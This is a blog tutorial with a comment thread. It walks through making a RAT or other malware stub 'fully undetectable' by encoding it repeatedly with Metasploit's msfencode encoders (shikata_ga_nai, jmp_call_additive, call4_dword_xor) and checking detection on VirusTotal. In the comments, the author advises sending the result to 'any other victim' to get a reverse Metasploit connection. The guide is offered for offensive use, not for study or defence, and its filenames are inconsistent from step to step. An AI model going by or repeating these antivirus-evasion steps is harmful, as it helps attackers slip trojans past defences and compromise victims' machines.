How to FUD a RAT stub with backtrack/kali ~ The Hacking Guide (Hack Tool & Tricks World)

How to FUD a RAT stub with Backtrack

Requirements:-

1. Backtrack Operating System
2. MSF encoders

So, our first step is to create a virus file with any of the tools like RAT, stealers, botnets, payload or anything. To make it FUD (Fully Undetectable), we use backtrack. Before going to FUD check your file with ant viruses at virustotal.com and we get a detection ratio for example lets say 30/44

Now start terminal in Backtrack and navigate to the directory where your file is located.

E.g. cd Desktop

So our first step is to change the permissions of that file (775) by typing this command

root@bt:~/Desktop# chmod 775 stub.exe

Further type this command to encode your virus,

root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o
/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10

You’ll notice Antivirus still detected it even though we encoded it 10 times with

“x86/shikata_ga_nai” encoder.

Now again change the permissions of this output file,

root@bt:~/Desktop# chmod 775 server2.exe

Now 2nd time, we use another encoder named as “jmp_call_additive”

root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o
/root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1

Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server3.exe

Now again we use another encoder named as “call4_dword_xor”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o
/root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1

Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server4.exe

Now final we encode again with this encoder “shikata_ga_nai”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o
/root/Desktop/final.exe -e x86/shikata_ga_nai -c 1

Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 final.exe

Now you'll get a final.exe, upload it to virustotal.com and you’ll see the results.

About Vineet Bharadwaj

Vineet Bharadwaj is the Founder of this Website. He is a Security Researcher, Pentration Tester and Certified Ethical Hacker with experience in various aspects of Information Security and Co author in "hakin9.org IT Security Magazine" n "E-forensics Magazine" and Author of Ebook "Wireshark: The packet sniffer" Also Got listed In many Big companies site's Hall Of Fame Other then He is a SEO expert,Web Analytic Expert, Blogger, Web Developer n Designer, Social Media Marketing. His all efforts is to make internet more Secure.

11 comments

Click here for comments

Anonymous

admin

August 31, 2014 at 9:58 PM ×

But then when I try to open it on windows it says that the version of this file is not compatible with the version of windows you're running. Check your computers system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.

Vineet

September 2, 2014 at 2:31 AM ×

It wont open cause its a encoded file in backtrack just send it to any other victim or try on your cm machine it will give a reverse connection in metasploit or i suggest you might you did anything wrong during this process :)

Unknown

November 19, 2014 at 10:51 PM ×

Is fud becouse is file raw and not ork is normally lol he don t have create exe at end lol

November 20, 2014 at 5:59 AM ×

R.I.P English -_- first of all its about to create stub FUD not a exe file .

Morda

December 4, 2014 at 11:10 PM × This comment has been removed by the author.

December 6, 2014 at 10:27 PM ×

You deleted my comment even tho I stuck up for you wow thanks....hope to see you soon

December 6, 2014 at 11:23 PM ×

Dont post backlinks over here . Use ur SEO techs somwhere else not on this blog. Leave a comment here or any query without any refer or back links. Hope you get it.